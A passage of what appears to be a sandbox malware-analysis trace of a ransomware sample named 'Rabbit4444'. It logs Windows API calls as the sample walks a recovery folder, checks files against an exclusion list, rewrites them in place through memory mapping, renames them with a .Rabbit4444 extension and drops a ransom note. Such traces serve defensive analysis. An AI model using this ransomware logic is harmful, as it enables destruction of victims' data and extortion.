hHeap=0xe0000) returned 1 [0044.079] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0044.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0044.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0044.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0044.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0044.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0044.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0044.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0044.082] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a000 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a530 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a318 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11a740 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b18 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0044.082] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbdb0 | out: lpPerformanceCount=0x11cbdb0*=13539294895) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0044.082] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0044.218] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0044.231] CloseHandle (hObject=0x2a0) returned 1 [0044.231] CloseHandle (hObject=0x29c) returned 1 [0044.231] wsprintfW (in: param_1=0x11cc0b0, param_2="%s.%s" | out: param_1="Z:\\Recovery\\WindowsRE\\boot.sdi.Rabbit4444") returned 41 [0044.231] MoveFileExW (lpExistingFileName="Z:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "z:\\recovery\\windowsre\\boot.sdi"), lpNewFileName="Z:\\Recovery\\WindowsRE\\boot.sdi.Rabbit4444" (normalized: "z:\\recovery\\windowsre\\boot.sdi.rabbit4444"), dwFlags=0x1) returned 1 [0044.232] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=3170304 | out: Addend=0xff5a0) returned 0 [0044.232] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=508 | out: Addend=0xff5ac) returned 0 [0044.232] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x80a0471e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x43d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReAgent.xml", cAlternateFileName="")) returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="Rabbit4444.exe") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2=".") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="..") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="windows") returned -1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootmgr") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="pagefile.sys") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="boot") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ids.txt") returned 1 [0044.232] lstrcmpiW (lpString1="ReAgent.xml", lpString2="NTUSER.DAT") returned 1 [0044.232] lstrcpyW (in: lpString1=0x11ce94c, lpString2="ReAgent.xml" | out: lpString1="ReAgent.xml") returned="ReAgent.xml" [0044.232] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml", dwFileAttributes=0x2002) returned 1 [0044.232] lstrlenW (lpString="ReAgent.xml") returned 11 [0044.232] lstrlenW (lpString="Rabbit4444") returned 10 [0044.232] lstrcmpiW (lpString1="eAgent.xml", lpString2="Rabbit4444") returned -1 [0044.232] lstrlenW (lpString=".dll") returned 4 [0044.233] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0044.233] lstrlenW (lpString=".lnk") returned 4 [0044.233] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0044.233] lstrlenW (lpString=".ini") returned 4 [0044.233] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0044.233] lstrlenW (lpString=".sys") returned 4 [0044.233] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0044.233] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "z:\\recovery\\windowsre\\reagent.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0044.233] QueryPerformanceFrequency (in: lpFrequency=0x11cbda0 | out: lpFrequency=0x11cbda0*=100000000) returned 1 [0044.233] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbda8 | out: lpPerformanceCount=0x11cbda8*=13554361909) returned 1 [0044.233] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbe00 | out: lpFileSize=0x11cbe00*=1085) returned 1 [0044.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0044.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0044.233] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x2a0 [0044.234] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x80000 [0044.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0044.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0044.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0044.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0044.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0044.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0044.266] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbdb0 | out: lpPerformanceCount=0x11cbdb0*=13557724757) returned 1 [0044.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0044.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0044.267] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0044.267] CloseHandle (hObject=0x2a0) returned 1 [0044.267] CloseHandle (hObject=0x29c) returned 1 [0044.267] wsprintfW (in: param_1=0x11cc0b0, param_2="%s.%s" | out: param_1="Z:\\Recovery\\WindowsRE\\ReAgent.xml.Rabbit4444") returned 44 [0044.267] MoveFileExW (lpExistingFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "z:\\recovery\\windowsre\\reagent.xml"), lpNewFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml.Rabbit4444" (normalized: "z:\\recovery\\windowsre\\reagent.xml.rabbit4444"), dwFlags=0x1) returned 1 [0044.267] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=1088 | out: Addend=0xff5a0) returned 3170304 [0044.267] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=33 | out: Addend=0xff5ac) returned 508 [0044.267] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0044.267] lstrcmpiW (lpString1="Winre.wim", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.267] lstrcmpiW (lpString1="Winre.wim", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.267] lstrcmpiW (lpString1="Winre.wim", lpString2="Rabbit4444.exe") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2=".") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2="..") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2="windows") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2="bootmgr") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2="pagefile.sys") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2="boot") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2="ids.txt") returned 1 [0044.268] lstrcmpiW (lpString1="Winre.wim", lpString2="NTUSER.DAT") returned 1 [0044.268] lstrcpyW (in: lpString1=0x11ce94c, lpString2="Winre.wim" | out: lpString1="Winre.wim") returned="Winre.wim" [0044.268] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\Winre.wim", dwFileAttributes=0x2002) returned 1 [0044.268] lstrlenW (lpString="Winre.wim") returned 9 [0044.268] lstrlenW (lpString="Rabbit4444") returned 10 [0044.268] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0044.268] lstrlenW (lpString=".dll") returned 4 [0044.268] lstrcmpiW (lpString1=".wim", lpString2=".dll") returned 1 [0044.268] lstrlenW (lpString=".lnk") returned 4 [0044.268] lstrcmpiW (lpString1=".wim", lpString2=".lnk") returned 1 [0044.268] lstrlenW (lpString=".ini") returned 4 [0044.268] lstrcmpiW (lpString1=".wim", lpString2=".ini") returned 1 [0044.268] lstrlenW (lpString=".sys") returned 4 [0044.268] lstrcmpiW (lpString1=".wim", lpString2=".sys") returned 1 [0044.268] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "z:\\recovery\\windowsre\\winre.wim"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0044.268] QueryPerformanceFrequency (in: lpFrequency=0x11cbda0 | out: lpFrequency=0x11cbda0*=100000000) returned 1 [0044.268] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbda8 | out: lpPerformanceCount=0x11cbda8*=13557912935) returned 1 [0044.268] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbe00 | out: lpFileSize=0x11cbe00*=491777489) returned 1 [0044.268] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0044.269] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0044.269] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d4ff0e0, lpName=0x0) returned 0x2a0 [0044.270] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1d400000, dwNumberOfBytesToMap=0xff0e0) returned 0x2c20000 [0044.306] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2d20000 [0044.605] UnmapViewOfFile (lpBaseAddress=0x2d20000) returned 1 [0044.850] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x7400000, dwNumberOfBytesToMap=0x200000) returned 0x2d20000 [0045.066] UnmapViewOfFile (lpBaseAddress=0x2d20000) returned 1 [0045.085] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xe800000, dwNumberOfBytesToMap=0x200000) returned 0x2d20000 [0045.252] UnmapViewOfFile (lpBaseAddress=0x2d20000) returned 1 [0045.271] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x15c00000, dwNumberOfBytesToMap=0x200000) returned 0x2d20000 [0045.776] UnmapViewOfFile (lpBaseAddress=0x2d20000) returned 1 [0045.916] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1d000000, dwNumberOfBytesToMap=0x200000) returned 0x2d20000 [0045.958] UnmapViewOfFile (lpBaseAddress=0x2d20000) returned 1 [0046.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0046.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0046.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0046.062] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbdb0 | out: lpPerformanceCount=0x11cbdb0*=13737277798) returned 1 [0046.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0046.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0046.062] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0046.071] CloseHandle (hObject=0x2a0) returned 1 [0046.072] CloseHandle (hObject=0x29c) returned 1 [0046.072] wsprintfW (in: param_1=0x11cc0b0, param_2="%s.%s" | out: param_1="Z:\\Recovery\\WindowsRE\\Winre.wim.Rabbit4444") returned 42 [0046.072] MoveFileExW (lpExistingFileName="Z:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "z:\\recovery\\windowsre\\winre.wim"), lpNewFileName="Z:\\Recovery\\WindowsRE\\Winre.wim.Rabbit4444" (normalized: "z:\\recovery\\windowsre\\winre.wim.rabbit4444"), dwFlags=0x1) returned 1 [0046.072] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=9432544 | out: Addend=0xff5a0) returned 3171392 [0046.072] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=1793 | out: Addend=0xff5ac) returned 541 [0046.072] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cddd0 | out: lpFindFileData=0x11cddd0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0046.072] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0046.072] lstrcpyW (in: lpString1=0x11ce94c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.072] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\recovery\\windowsre\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0046.073] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0046.073] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0046.074] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.074] CloseHandle (hObject=0x29c) returned 1 [0046.074] CloseHandle (hObject=0x298) returned 1 [0046.074] GetCurrentThreadId () returned 0x540 [0046.074] RtlInterlockedPopEntrySList (in: ListHead=0xf6390 | out: ListHead=0xf6390) returned 0x0 [0046.074] GetCurrentThreadId () returned 0x540 [0046.075] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce020*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0046.075] RtlInterlockedPopEntrySList (in: ListHead=0xf6390 | out: ListHead=0xf6390) returned 0x0 [0046.075] RtlInterlockedFlushSList (in: ListHead=0xf6390 | out: ListHead=0xf6390) returned 0x0 [0046.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0046.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff590 | out: hHeap=0xe0000) returned 1 [0046.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115e80 | out: hHeap=0xe0000) returned 1 [0046.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0046.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0046.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 Thread: id = 14 os_tid = 0xe00 [0046.558] RtlInterlockedPopEntrySList (in: ListHead=0xf6410 | out: ListHead=0xf6410) 